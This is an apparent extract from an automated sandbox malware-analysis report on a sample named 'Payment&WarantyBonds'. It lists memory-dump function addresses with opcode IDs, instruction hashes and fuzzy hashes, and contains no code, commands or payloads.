                                                                                                                                                                                • Instruction Fuzzy Hash: E7F0F933A41A14BBC7729B5A8C84F477EAEEB84B90F104028BA05D7640D670EE01CAA1
                                                                                                                                                                                Function 0182C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                • Instruction ID: aba7fc73540be0162f76f21e3474fdf8c2375ebc3011adfd88fe3e86216a0f7a
                                                                                                                                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                • Instruction Fuzzy Hash: ECF04FB2A00625ABD325CF4D9840E67FBEADBD5B90F058129E955D7220EA31DE05CB90
                                                                                                                                                                                Function 017FC310 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                • Instruction ID: 2599357dca2fa8eb73410f893fb30cfb5a8e841670f137b0e64507bb6c0130d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                • Instruction Fuzzy Hash: B4F0FC332046279BD733165D8840F2BFA95CFD5BE4F1A043DE7059B304C9608D0196D3
                                                                                                                                                                                Function 018D634F Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bb2648529dee1f54881df47b2a2568eb8ef8a8eaabe25cc2bd71c662a4bb698a
                                                                                                                                                                                • Instruction ID: bbd4c8a781961fde35100228e05b5061fd475c6425a921808265983db7e27742
                                                                                                                                                                                • Opcode Fuzzy Hash: bb2648529dee1f54881df47b2a2568eb8ef8a8eaabe25cc2bd71c662a4bb698a
                                                                                                                                                                                • Instruction Fuzzy Hash: 0F012C71A1020DABDB04DFA9D951AAEB7F8FF58304F10406AE904E7350DA74DB018BA5
                                                                                                                                                                                Function 018D62D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c72e92a02002b52944a656d1e31dc2f92f23887eb9dbd739cd10634eaff69eb8
                                                                                                                                                                                • Instruction ID: 65ff162d9a7936bd02e55b5aebe847ec95af28fd8ecf117b4e79d34a25c0f9af
                                                                                                                                                                                • Opcode Fuzzy Hash: c72e92a02002b52944a656d1e31dc2f92f23887eb9dbd739cd10634eaff69eb8
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C012C71A0020DABDB04DFA9D441AAEBBF8EF58304F50406AE914E7390DA749A018BA5
                                                                                                                                                                                Function 018D625D Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 54f74d12366cdd7a256cfabeb3fdc6c7bcbf700416fda0b643eb9bf13a092b55
                                                                                                                                                                                • Instruction ID: ababff36a555da98a7fda162a508e9875502519f289e316c0ec7ef6ba4607c5b
                                                                                                                                                                                • Opcode Fuzzy Hash: 54f74d12366cdd7a256cfabeb3fdc6c7bcbf700416fda0b643eb9bf13a092b55
                                                                                                                                                                                • Instruction Fuzzy Hash: DD012C71A1021EABCB04DFADD451AAEB7F8EF58304F14406AF904E7351D674AA018BA5
                                                                                                                                                                                Function 018D61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b0769f88dd2a96263d0d61d0895a7953a9ba83113401eeb1d4807dcf5675cc4a
                                                                                                                                                                                • Instruction ID: 142d0f253937ca967487729fd5e005aa91bb38f36b8126eb4b052f842d624682
                                                                                                                                                                                • Opcode Fuzzy Hash: b0769f88dd2a96263d0d61d0895a7953a9ba83113401eeb1d4807dcf5675cc4a
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D014F71A0025D9BDB04DFA9D445AEEBBF8FF58314F14405AE905E7280EB74EB01CB95
                                                                                                                                                                                Function 018863C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                • Instruction ID: e3ba69fd3be968e9209cd2d44656c38baecff098c868abed509de99a4f09a7f8
                                                                                                                                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF0127220001DBFEF029F98DD80DAF7B7DFB55398B204125FA11D2160E631DE21A7A0
                                                                                                                                                                                Function 0188A4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: afddcd8f2ee9abd27d52520f8171eb45f2a181b23dc2712b7e8fbbac6f77e10e
                                                                                                                                                                                • Instruction ID: ab21053a75e0b1e9fee0a756863fe884b3346777d5aa290761032bcbc92eca8e
                                                                                                                                                                                • Opcode Fuzzy Hash: afddcd8f2ee9abd27d52520f8171eb45f2a181b23dc2712b7e8fbbac6f77e10e
                                                                                                                                                                                • Instruction Fuzzy Hash: 83018936100149ABCF12AE88D840EDA3F66FB4C764F058116FE18A6260C336DAB0EF91
                                                                                                                                                                                Function 017FC0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 17e014bb7695a48747077189e67f76f6ef1db7094288a6653dbb380f20000547
                                                                                                                                                                                • Instruction ID: cb4b12a0a21c6b6c620fa8f807f7f8307a74ed27f3dd78896ac0bcdadd6807e0
                                                                                                                                                                                • Opcode Fuzzy Hash: 17e014bb7695a48747077189e67f76f6ef1db7094288a6653dbb380f20000547
                                                                                                                                                                                • Instruction Fuzzy Hash: B9F02BB12042495BF356951D8C01F23B2AAE7C0754FB5807DEB058B3C1FA71DC1183A5
                                                                                                                                                                                Function 0183656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cbf3e2789b2f9449366b739104bf9b1c57dace49faa0ef3ff2ce0c1bb55280a4
                                                                                                                                                                                • Instruction ID: 5760cdf0aaf6c7bb2889342d5075094735664afa14beb57458d1391ab01dcc26
                                                                                                                                                                                • Opcode Fuzzy Hash: cbf3e2789b2f9449366b739104bf9b1c57dace49faa0ef3ff2ce0c1bb55280a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 0301A470305685EBE322AB6CCD48F253BA9BB80B04F5801A4BA15DB6D6E728D7018621
                                                                                                                                                                                Function 018A437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                • Instruction ID: 79307dc28da84dbd81a628fce33d393506385dd1a96d89ee0aaef7d680f257ef
                                                                                                                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                • Instruction Fuzzy Hash: FCF0BE36341A1347FF36AA2E8820F2FAA95AF90B01B4D452C9701CB680DFA0DA048791
                                                                                                                                                                                Function 0188C89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5b68732047824c74e23c6dedb469928befef73357a92cee8d2635a240fd3feee
                                                                                                                                                                                • Instruction ID: 8263d7c72be27777e3a26be97c0f49a3404a682837cefd35aa45f44a14fe2624
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b68732047824c74e23c6dedb469928befef73357a92cee8d2635a240fd3feee
                                                                                                                                                                                • Instruction Fuzzy Hash: 96F0AF716193089FC310EF68C441A1AB7E4FF98714F80465ABC98DB394EA34EA00CB96
                                                                                                                                                                                Function 0188E872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                • Instruction ID: 50019c138f585666e514ce002170ac783669d93318d4763b2f95a417484cf28c
                                                                                                                                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                • Instruction Fuzzy Hash: C2F082337256229BE331AA4ECC80F1AB7A8EFD5B60F190065AA04DB264C760ED01C7D0
                                                                                                                                                                                Function 01830854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                • Instruction ID: c50ffdaa2d8e69c378ffbe1c6d7c8a792063c53277aa0e9441fdb46fc22ef15d
                                                                                                                                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                • Instruction Fuzzy Hash: 87F0B472614204AFE714DF25CC05F56B6E9EFE8344F188078AA45D7264FAB0DE01C694
                                                                                                                                                                                Function 0188C912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4f5ed9a31cc03a12517ee802cc08bdfd042ed66dc823db68979c934a6cf6ff51
                                                                                                                                                                                • Instruction ID: 0dfd6370299495307dc79a6b58538d439fd37e321c632dfb2d023aa5c97d6d8c
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5ed9a31cc03a12517ee802cc08bdfd042ed66dc823db68979c934a6cf6ff51
                                                                                                                                                                                • Instruction Fuzzy Hash: C3F04F70A0124D9FCB04EFA9C515A9EB7B4EF18304F10805AB955EB385DA38EB01CB65
                                                                                                                                                                                Function 018047FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a1c8135be5ef06a9ca61923b5ab7194f6cd148cc1079ee93230a3e7e2f818f6b
                                                                                                                                                                                • Instruction ID: 8c4e3b7d500fabe56c742b08e6b459b922c90480c501e4368df5c0bdaed89f83
                                                                                                                                                                                • Opcode Fuzzy Hash: a1c8135be5ef06a9ca61923b5ab7194f6cd148cc1079ee93230a3e7e2f818f6b
                                                                                                                                                                                • Instruction Fuzzy Hash: 95F0F0719862DC9EE7A38B2CC804B21BBD49B08725F084C6AC789C3582C7A0DB80C611
                                                                                                                                                                                Function 018C0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2c5e31ff7707414a08b9062473e0b9e3c6a8e032f3c15aeb243ecc35ae5a91aa
                                                                                                                                                                                • Instruction ID: 61490b3ac7fdae6d6a818f77c6ce5e28559c26970875ce5e069f4a0259fc093e
                                                                                                                                                                                • Opcode Fuzzy Hash: 2c5e31ff7707414a08b9062473e0b9e3c6a8e032f3c15aeb243ecc35ae5a91aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 66F0272A516A8086CF325B2C68907D5AB54E781B50F29114ED9A0D7306E578C783CB21
                                                                                                                                                                                Function 0183C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5409087c610923569d1ecfd2c27b1240386f0d981bae312b5fcdc36fe1ecdb8b
                                                                                                                                                                                • Instruction ID: 9d1e05f104e1818094bf8a5da35b25dda0106a72e2804225917b97779330c6db
                                                                                                                                                                                • Opcode Fuzzy Hash: 5409087c610923569d1ecfd2c27b1240386f0d981bae312b5fcdc36fe1ecdb8b
                                                                                                                                                                                • Instruction Fuzzy Hash: A4F052714012809FEB22876CC408B11BBE89B807A4F0C982FC402D3522E720EA80DAD1
                                                                                                                                                                                Function 01842619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                                • Instruction ID: dea38223d81a9030c3e2799aa883fdf6a07f0126b0911190512c0b6f3d070b60
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 5DE092323006016BE7219E5D9C80F477B6E9FD6B10F040079B5049F251C9E29E0986A5
                                                                                                                                                                                Function 01896030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                                • Instruction ID: 6ef3f9e976feb1cafd27223dcc7a2fa66d2857b1c82248d1343d1692b9f56db0
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF06572104204DFE7218F09DD84F52BBF8EB55768F59C026E609EB561E379ED40CBA4
                                                                                                                                                                                Function 01800710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                                • Instruction ID: 4a5aa71b918d5a70cda6bd4f15242ec948eb73f0e7f335ceb14ecf31dc65c5a7
                                                                                                                                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF0E53A2047499BDB57CF19C440A957BA8FB413A0B044054FC46CB341D736EB81CB51
                                                                                                                                                                                Function 018349D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                • Instruction ID: 873a9a8245a1f535bdca283f720f231c133ae2395e49e6323e0c15ee28125c68
                                                                                                                                                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                • Instruction Fuzzy Hash: D9E0D833244149ABD3212A5D8800B667BA9EBD17A0F190429E200CB151DB70DE42C7D8
                                                                                                                                                                                Function 018D4164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7f6a3f21ad1d44b491625b2c38e40cffca849c07656a78bc50325b8720347f6b
                                                                                                                                                                                • Instruction ID: 7e49ffcdea1a7b4f12db8c3c0135ba85799c0fe2369cdc6d559969017d8788f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f6a3f21ad1d44b491625b2c38e40cffca849c07656a78bc50325b8720347f6b
                                                                                                                                                                                • Instruction Fuzzy Hash: 14F03932A2AB918FEB62D73CE684B56B7E4AB10730F5A05A4D415C7D12D734EE80C660
                                                                                                                                                                                Function 018A678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                • Instruction ID: 2dc5bd0eae532c38193cdbcf27db6152b699a66eeff5844014fb1d2c58cf39e5
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                • Instruction Fuzzy Hash: E4E0DF32A00120BBEB2197998D05F9ABEACDB90FA0F190054B700E70E4E570DF00C6D0
                                                                                                                                                                                Function 018D08C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                • Instruction ID: 322f75aa844df1c67ac5288a16453ed29a5e2bfb821bcc14905e9f610a2e349a
                                                                                                                                                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                • Instruction Fuzzy Hash: DFE09B316403548BCB259A1EC541A77BFE8DF95764F15806DE90587712C631F942C6D0
                                                                                                                                                                                Function 018025E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 93871fe1fb314e441b830c64be9405218d5a3b9ff3c78cd9b6dd628238697d82
                                                                                                                                                                                • Instruction ID: 0dd7aeaf7d58245c8294d31b0f391d3d48bb2d7bfab3089cb93c317783ee46e1
                                                                                                                                                                                • Opcode Fuzzy Hash: 93871fe1fb314e441b830c64be9405218d5a3b9ff3c78cd9b6dd628238697d82
                                                                                                                                                                                • Instruction Fuzzy Hash: 14E092321009589BC322BB2DDD01F8A779AEF60360F114529B115971A0CB34AA10C785
                                                                                                                                                                                Function 018BA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                Download Yara Rule
